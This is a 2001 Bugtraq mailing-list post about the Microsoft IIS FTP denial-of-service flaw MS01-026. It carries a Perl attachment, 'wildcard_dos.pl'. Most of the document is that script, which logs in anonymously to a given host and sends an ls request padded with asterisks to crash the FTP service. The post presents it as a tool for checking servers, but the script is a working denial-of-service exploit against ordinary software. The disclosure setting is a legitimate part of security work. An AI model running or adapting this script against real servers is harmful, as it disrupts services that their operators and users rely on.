Date: Wed, 16 May 2001 10:47:04 -0500
From: Critical Watch Bugtraqqer <[email protected]>
To: [email protected]Subject: Microsoft IIS FTP DoS -- MS01-026
This is a multi-part message in MIME format.
------=_NextPart_000_0010_01C0DDF5.8B7572B0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Simple perl script for checking FTP servers for the DoS issue covered in
MS01-026.
Nelson Bunker, CISSP
Critical Watch
http://www.criticalwatch.com
Enlightenment, Empowerment, Answers T
------=_NextPart_000_0010_01C0DDF5.8B7572B0
Content-Type: application/octet-stream;
name="wildcard_dos.pl"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="wildcard_dos.pl"
#!/usr/bin/perl
# Author: Nelson Bunker - Critical Watch=20
# http://www.criticalwatch.com=20
#
# Simple Wildcard Denial of Service for IIS Ftp Servers - MS01-026=20
# Tested against several servers. Your mileage may vary.
#
# Assumes anonymous access.
#
# Thanks goes out to Lukasz Luzar [[email protected]]
# For discovering and sharing this information
#
# May 15, 2001
####################_MAIN::Begin_#####################
use Net::FTP;=20
=
$wildcard=3D'************************************************************=
*********************************************';
if (not $ARGV[0]) {
print qq~
Usage: wildcard_dos.pl <host>
~;
exit;}
$IPaddress=3D $ARGV[0];
$SIG {'PIPE'} =3D FoundIt;
# create new FTP connection w/30 second timeout
$ftp =3D Net::FTP->new($IPaddress, Timeout =3D> 5);
if(!$ftp){ die"$IPaddress is not responding to ftp connect =
attempt";}
if(!$ftp->login("anonymous","tester\@")){ die"FTP user anonymous =
on $IPaddress is unacceptable";}
$bogus =3D $ftp->ls($wildcard);
sub FoundIt
{
print "This machine \($IPaddress\) is affected\n";
exit(0);
}
------=_NextPart_000_0010_01C0DDF5.8B7572B0--